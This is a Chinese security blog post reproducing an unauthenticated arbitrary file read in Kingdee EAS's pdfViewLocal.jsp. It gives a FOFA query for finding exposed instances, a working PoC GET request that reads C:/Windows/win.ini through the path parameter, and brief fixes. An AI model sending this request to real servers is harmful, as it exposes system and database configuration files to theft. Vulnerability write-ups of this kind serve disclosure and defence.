金蝶EAS pdfviewlocal 任意文件读取漏洞复现

已于 2024-01-08 19:12:10 修改
阅读量1k 收藏 10
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-01-08 19:11:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135464174
版权

0x01 产品简介

金蝶EAS 为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。

0x02 漏洞概述

金蝶EAS pdfviewlocal接口处存在任意文件读取漏洞,未经身份验证的攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

app="Kingdee-EAS"

0x04 漏洞复现

PoC

GET /plt_document/fragments/content/pdfViewLocal.jsp?path=C:/Windows/win.ini HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

读取C:/Windows/win.ini

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0xSecl
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
金蝶EAS8.5数据字典(全部表结构说明)
08-16
金蝶EAS8.5数据字典,全部表结构说明,包含超级详细的表、字段说明,以及关联字段说明。
PDF阅读器系列之--MuPDF源码分析过程(一)
纸上得来终觉浅,绝知此事要躬行
04-22 5398
正题 1.链接 https://github.com/JoanZapata/android-pdfview/  http://www.mupdf.com/docs/how-to-build-mupdf-for-android  https://github.com/muennich/mupdf  https://code.google.com/p/vudroid/  https
Android加载预览PDF文件
lf0814的博客
10-20 7991
Android加载预览PDF文件
金蝶EAS pdfviewlocal 任意文件读取漏洞
3tefanie丶zhou的博客
01-09 725
【少年不惧岁月长,彼方尚有荣光在。】
PDF文件预览 简单实现
weixin_41622014的博客
11-06 583
java后端代码 /** * (HttpClient)爬虫获取各种资源pdf文件 跳ssl验证 * @param response * @param dataJson pdf 文件路径 */ @GetMapping("/pdfFile") public void getFile(HttpServletResponse response, String dataJson) { service.pdfview(response,dataJs
金蝶EAS pdfviewlocal任意文件读取漏洞
Keepb1ue的博客
01-08 2106
金蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。金蝶 EAS Cloud pdfViewLocal.jsp存在任意文件读取漏洞漏洞,攻击者可通过该漏洞在服务器端读取任意敏感文件
金蝶EAS数据库表结构万能版本数据字典
11-07
适配不同的EAS版本,通过可视化的GUI界面输入表名或者实体名等查找对应表结构,结构内内容详细,清晰。是配合BOS 开发的利器,大大提升开发效率和运维效率。使用方便,仅需配合EAS客户端,一键脚本运行。内含详细使用...
金蝶EAS 部署拆包文件
01-03
EAS 部署拆包文件 详细拆包步骤及说明,请走此链接:https://blog.csdn.net/tanrt/article/details/85707747
金蝶EAS V8.5 发版说明.pdf
10-03
金蝶EAS V8.5 发版说明 产品简介 时代在快速发生着变化,人工智能、区块链、云计算、大数据、IOT 等新技术在广泛影 响着社会的发展,同时企业管理也在发生的变化:组织边界模糊、多元共生、个体崛起、共 享管理等,...
金蝶EAS DEP脚本汇总.docx
12-17
金蝶EAS DEP脚本汇总.
Chrome浏览器如何安装与使用PDFViewer扩展程序
yisago的博客
05-14 2043
chrome浏览器本身就有文档查看的功能,但是这个功能非常的简单,不支持文档的其他操作和演示,所有需要用户另外安装插件,这样在阅读文档的时候就会更加的方便,现在这些问题都可以通过这个软件完成,马上使用手机快速安装使用吧!今天小编就会教大家这个方法,让用户可以更加便捷的使用,只要下载一个插件就可以享受这个服务,使用起来非常的便捷,那么就让我们一起来看看这个功能要如何操作使用吧,详细的操作步骤就在下方,让我们一起来看看吧! Chrome浏览器如何安装与使用PDFViewer扩展程序      在安装PDF Vi
Android:使用MuPDF显示PDF文件,解决不显示电子章问题
wzl_show的博客
02-27 7770
    前段时间在项目中要添加用PDF显示合同的功能,发现Andorid本身并不支持显示PDF,后来在网上搜索使用pdfView来显示,本身pdfView项目包挺大的,我使用了旧的版本自己优化了一下,使得自己的项目包只增加了1M左右的大小,本来以为就这样解决了,结果后来项目经理跟我说:APP的PDF上没有电子章,合同没有章怎么行.....然后又在网上各种找资料,在百度上搜愣是没有搜到任何关于and...
Android实现PDF格式文件预览
u012556114的博客
09-28 6937
接着上一篇的博客,在搜索出手机内的.pdf格式文件后,实现pdf文件的预览的方式有很多, 1.Android PdfViewer项目地址:https://github.com/barteksc/AndroidPdfViewer 功能很强大, 使用也比较广, 亲测可以使用. 唯一的缺点 :添加到项目中 会使apk增加10M左右, 这是最不能接受的, 故弃用. 2.PdfViewPager: 项...
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
[图解]SysML和EA建模住宅安全系统-05
最新发布
rolt的专栏
05-18 650
作用就是定义属性之间的数学关系
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 365
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
RSAC 2024观察:软件供应链安全进入AI+时代
lurenjia404的博客
05-15 922
盘点RSAC会议上软件供应链安全议题的特点、趋势及启示。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 466
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
金蝶eas文件上传漏洞
10-13
关于金蝶eas文件上传漏洞,我可以提供一些基本信息。该漏洞是指攻击者可以通过上传恶意文件来执行任意代码,从而获取系统权限。这个漏洞存在于金蝶eas文件上传功能中,攻击者可以通过构造特定的上传请求来绕过文件类型检查和安全限制。 为了防止这种漏洞的发生,金蝶eas的开发者应该加强对文件上传功能的安全性检查,例如限制上传文件的类型、大小和数量等。此外,还可以采用一些防御措施,如使用反病毒软件、禁用不必要的服务和端口等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值